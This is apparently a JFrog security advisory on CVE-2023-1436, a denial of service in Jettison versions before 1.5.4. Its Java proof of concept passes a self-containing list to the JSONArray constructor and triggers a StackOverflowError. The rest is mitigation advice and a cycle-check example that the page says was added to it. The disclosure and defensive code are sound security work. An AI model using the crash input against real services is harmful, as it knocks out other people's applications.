JFrog Security Research

XRAY-427911 - Jettison JSONArray DoS

CVE-2023-1436 | CVSS 5.9

JFrog Severity: medium

Discovered by Nitay Meiron of the JFrog Security Research Team

Published 16 Mar, 2023 | Last updated 16 Mar, 2023

Infinite recursion in Jettison leads to denial of service when creating a crafted JSONArray

Affected component: org.codehaus.jettison:jettison

Vulnerable versions: (,1.5.4) (Maven range notation: every release before 1.5.4)

An infinite recursion is triggered in Jettison when constructing a JSONArray from a Collection that contains a reference back to itself in one of its elements. The constructor recurses into each nested Collection it finds, so a self-containing list never finishes wrapping and a StackOverflowError is thrown. Any application that builds a JSONArray from caller-controlled Collections can therefore be crashed, or have its request thread killed, by such input.

import java.util.ArrayList;
import org.codehaus.jettison.json.JSONArray;
import org.codehaus.jettison.json.JSONException;

public class POC {
    public static void main(String[] args) throws JSONException {
        ArrayList<Object> list = new ArrayList<>();
        // The list contains itself, so Jettison's recursive wrapping of nested
        // Collections never terminates and a StackOverflowError is thrown here.
        list.add(list);
        JSONArray jsonArray = new JSONArray(list);
    }
}

The vulnerable range above ends before 1.5.4, so upgrading Jettison is the preferred fix. Where that is not possible, wrap Jettison's JSONArray constructor with exception handling. Note that StackOverflowError extends java.lang.Error, not Exception, so a generic catch (Exception e) will not catch it; it must be named explicitly:

try {
    // 'list' is the caller-supplied Collection being serialized
    JSONArray jsonArray = new JSONArray(list);
}
catch (StackOverflowError e) {
    // Reached when the input contains a self-reference; reject the input instead of crashing the thread.
    System.err.println("ERROR: Stack limit reached");
}
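Catching the error after the fact still burns the full stack before the input is rejected. A cheaper and more predictable mitigation is to reject cyclic (and excessively deep) input before it ever reaches Jettison. The following is an added example written for this page, not code from JFrog or from the Jettison project; the class name SafeJsonArray, the MAX_DEPTH limit and the main() sample input are assumptions chosen for the illustration.

```java
import java.util.ArrayList;
import java.util.Collection;
import java.util.Collections;
import java.util.IdentityHashMap;
import java.util.Map;
import java.util.Set;

import org.codehaus.jettison.json.JSONArray;
import org.codehaus.jettison.json.JSONException;

public final class SafeJsonArray {

    // Hypothetical nesting limit for this example: even an acyclic structure
    // can exhaust the stack if it is nested deeply enough, so cap it as well.
    private static final int MAX_DEPTH = 64;

    /** Builds a JSONArray only after verifying the input contains no container cycle. */
    public static JSONArray build(Collection<?> input) throws JSONException {
        // Identity-based set: calling equals()/hashCode() on a self-containing
        // list would itself recurse forever, so containers are compared by reference.
        Set<Object> onPath = Collections.newSetFromMap(new IdentityHashMap<>());
        checkAcyclic(input, onPath, 0);
        return new JSONArray(input);
    }

    // Depth-first walk over Collections and Maps (the container types Jettison
    // recurses into). 'onPath' holds the containers on the current descent path;
    // meeting one of them again means the structure points back at its ancestor.
    private static void checkAcyclic(Object node, Set<Object> onPath, int depth) {
        if (depth > MAX_DEPTH) {
            throw new IllegalArgumentException("nesting deeper than " + MAX_DEPTH);
        }
        Iterable<?> children;
        if (node instanceof Collection) {
            children = (Collection<?>) node;
        } else if (node instanceof Map) {
            children = ((Map<?, ?>) node).values();
        } else {
            return; // scalars and strings cannot reference back into the structure
        }
        if (!onPath.add(node)) {
            throw new IllegalArgumentException("self-referencing container at depth " + depth);
        }
        for (Object child : children) {
            checkAcyclic(child, onPath, depth + 1);
        }
        // Leaving the container: the same object appearing twice as siblings
        // (a DAG) is harmless for serialization; only true cycles are rejected.
        onPath.remove(node);
    }

    public static void main(String[] args) throws JSONException {
        // Constructed sample input reproducing the advisory's trigger.
        ArrayList<Object> list = new ArrayList<>();
        list.add(list);
        try {
            build(list);
            System.out.println("unexpected: cyclic input accepted");
        } catch (IllegalArgumentException e) {
            System.err.println("rejected: " + e.getMessage());
        }
    }
}
```

The check costs one pass over the containers and fails fast with an ordinary exception the caller can map to a 400-style rejection, instead of letting a request thread unwind a full stack. Because it inspects the input rather than relying on Jettison's internals, it also holds for versions where the constructor's behaviour differs from the one described above.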

No references are supplied for this issue
